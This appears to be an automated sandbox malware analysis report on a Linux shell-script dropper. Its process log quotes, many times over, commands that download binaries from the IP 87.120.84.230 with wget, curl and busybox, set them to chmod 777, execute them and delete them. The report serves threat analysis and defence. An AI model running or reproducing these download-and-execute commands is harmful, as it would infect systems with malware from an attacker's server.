Malware Analysis Report

2024-11-13 17:45

Sample ID 241110-bc4gksynfk
Target 0aab00d4e7063c05a4a2623bcf37a039.bin
SHA256 95952567b571cd2e6817a255a63f29c9096c91d7c044d23504c02770f893c4ac
Tags
defense_evasion antivm discovery
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

95952567b571cd2e6817a255a63f29c9096c91d7c044d23504c02770f893c4ac

Threat Level: Shows suspicious behavior

The file 0aab00d4e7063c05a4a2623bcf37a039.bin was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion antivm discovery

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

Reads runtime system information

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-10 01:00

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-10 01:00

Reported

2024-11-10 01:03

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

22s

Max time network

131s

Command Line

[/tmp/0491ed426c15fab2ce6c778d2a7857aaa4e517fec58524b71c1a7e6ea4e8a574.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO /tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO N/A
N/A /tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J /tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J N/A
N/A /tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv /tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv N/A
N/A /tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3 /tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3 N/A
N/A /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt N/A
N/A /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV N/A
N/A /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B N/A
N/A /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc N/A
N/A /tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR /tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR N/A
N/A /tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5 /tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5 N/A
N/A /tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y /tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y N/A
N/A /tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF /tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF N/A
N/A /tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl /tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl N/A
N/A /tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug /tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug N/A
N/A /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt N/A
N/A /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV N/A
N/A /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B N/A
N/A /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc N/A
N/A /tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR /tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR N/A
N/A /tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv /tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv N/A
N/A /tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3 /tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3 N/A
N/A /tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5 /tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5 N/A
N/A /tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y /tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y N/A
N/A /tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF /tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF N/A
N/A /tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl /tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl N/A
N/A /tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug /tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug N/A
N/A /tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO /tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO N/A
N/A /tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J /tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug /usr/bin/curl N/A
File opened for modification /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV /usr/bin/curl N/A
File opened for modification /tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv /usr/bin/curl N/A
File opened for modification /tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J /usr/bin/curl N/A
File opened for modification /tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y /usr/bin/curl N/A
File opened for modification /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt /usr/bin/curl N/A
File opened for modification /tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y /usr/bin/curl N/A
File opened for modification /tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3 /usr/bin/curl N/A
File opened for modification /tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5 /usr/bin/curl N/A
File opened for modification /tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5 /usr/bin/curl N/A
File opened for modification /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc /usr/bin/curl N/A
File opened for modification /tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl /usr/bin/curl N/A
File opened for modification /tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO /usr/bin/curl N/A
File opened for modification /tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3 /usr/bin/curl N/A
File opened for modification /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV /usr/bin/curl N/A
File opened for modification /tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR /usr/bin/curl N/A
File opened for modification /tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF /usr/bin/curl N/A
File opened for modification /tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR /usr/bin/curl N/A
File opened for modification /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B /usr/bin/curl N/A
File opened for modification /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc /usr/bin/curl N/A
File opened for modification /tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug /usr/bin/curl N/A
File opened for modification /tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J /usr/bin/curl N/A
File opened for modification /tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv /usr/bin/curl N/A
File opened for modification /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt /usr/bin/curl N/A
File opened for modification /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B /usr/bin/curl N/A
File opened for modification /tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl /usr/bin/curl N/A
File opened for modification /tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF /usr/bin/curl N/A
File opened for modification /tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO /usr/bin/curl N/A

Processes

/tmp/0491ed426c15fab2ce6c778d2a7857aaa4e517fec58524b71c1a7e6ea4e8a574.sh

[/tmp/0491ed426c15fab2ce6c778d2a7857aaa4e517fec58524b71c1a7e6ea4e8a574.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.84.230/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/bin/chmod

[chmod 777 d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO

[./d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/bin/rm

[rm d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/usr/bin/wget

[wget http://87.120.84.230/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/bin/chmod

[chmod 777 b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J

[./b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/bin/rm

[rm b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/usr/bin/wget

[wget http://87.120.84.230/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/bin/chmod

[chmod 777 V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv

[./V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/bin/rm

[rm V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/usr/bin/wget

[wget http://87.120.84.230/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/bin/chmod

[chmod 777 trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3

[./trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/bin/rm

[rm trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/usr/bin/wget

[wget http://87.120.84.230/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/bin/chmod

[chmod 777 qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt

[./qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/bin/rm

[rm qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/usr/bin/wget

[wget http://87.120.84.230/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/bin/chmod

[chmod 777 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV

[./6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/bin/rm

[rm 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/usr/bin/wget

[wget http://87.120.84.230/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/bin/chmod

[chmod 777 z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B

[./z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/bin/rm

[rm z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/usr/bin/wget

[wget http://87.120.84.230/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/bin/chmod

[chmod 777 qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc

[./qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/bin/rm

[rm qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/usr/bin/wget

[wget http://87.120.84.230/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/bin/chmod

[chmod 777 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR

[./619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/bin/rm

[rm 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/usr/bin/wget

[wget http://87.120.84.230/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/bin/chmod

[chmod 777 pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5

[./pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/bin/rm

[rm pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/usr/bin/wget

[wget http://87.120.84.230/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/bin/chmod

[chmod 777 wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y

[./wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/bin/rm

[rm wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/usr/bin/wget

[wget http://87.120.84.230/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/bin/chmod

[chmod 777 mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF

[./mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/bin/rm

[rm mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/usr/bin/wget

[wget http://87.120.84.230/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/bin/chmod

[chmod 777 hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl

[./hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/bin/rm

[rm hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/usr/bin/wget

[wget http://87.120.84.230/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/bin/chmod

[chmod 777 nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug

[./nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/bin/rm

[rm nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/usr/bin/wget

[wget http://87.120.84.230/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/bin/chmod

[chmod 777 qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt

[./qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/bin/rm

[rm qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/usr/bin/wget

[wget http://87.120.84.230/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/bin/chmod

[chmod 777 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV

[./6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/bin/rm

[rm 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/usr/bin/wget

[wget http://87.120.84.230/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/bin/chmod

[chmod 777 z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B

[./z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/bin/rm

[rm z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/usr/bin/wget

[wget http://87.120.84.230/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/bin/chmod

[chmod 777 qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc

[./qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/bin/rm

[rm qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/usr/bin/wget

[wget http://87.120.84.230/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/bin/chmod

[chmod 777 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR

[./619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/bin/rm

[rm 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/usr/bin/wget

[wget http://87.120.84.230/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/bin/chmod

[chmod 777 V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv

[./V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/bin/rm

[rm V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/usr/bin/wget

[wget http://87.120.84.230/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/bin/chmod

[chmod 777 trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3

[./trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/bin/rm

[rm trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/usr/bin/wget

[wget http://87.120.84.230/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/bin/chmod

[chmod 777 pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5

[./pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/bin/rm

[rm pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/usr/bin/wget

[wget http://87.120.84.230/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/bin/chmod

[chmod 777 wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y

[./wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/bin/rm

[rm wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/usr/bin/wget

[wget http://87.120.84.230/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/bin/chmod

[chmod 777 mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF

[./mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/bin/rm

[rm mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/usr/bin/wget

[wget http://87.120.84.230/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/bin/chmod

[chmod 777 hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl

[./hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/bin/rm

[rm hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/usr/bin/wget

[wget http://87.120.84.230/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/bin/chmod

[chmod 777 nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug

[./nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/bin/rm

[rm nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/usr/bin/wget

[wget http://87.120.84.230/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/bin/chmod

[chmod 777 d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO

[./d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

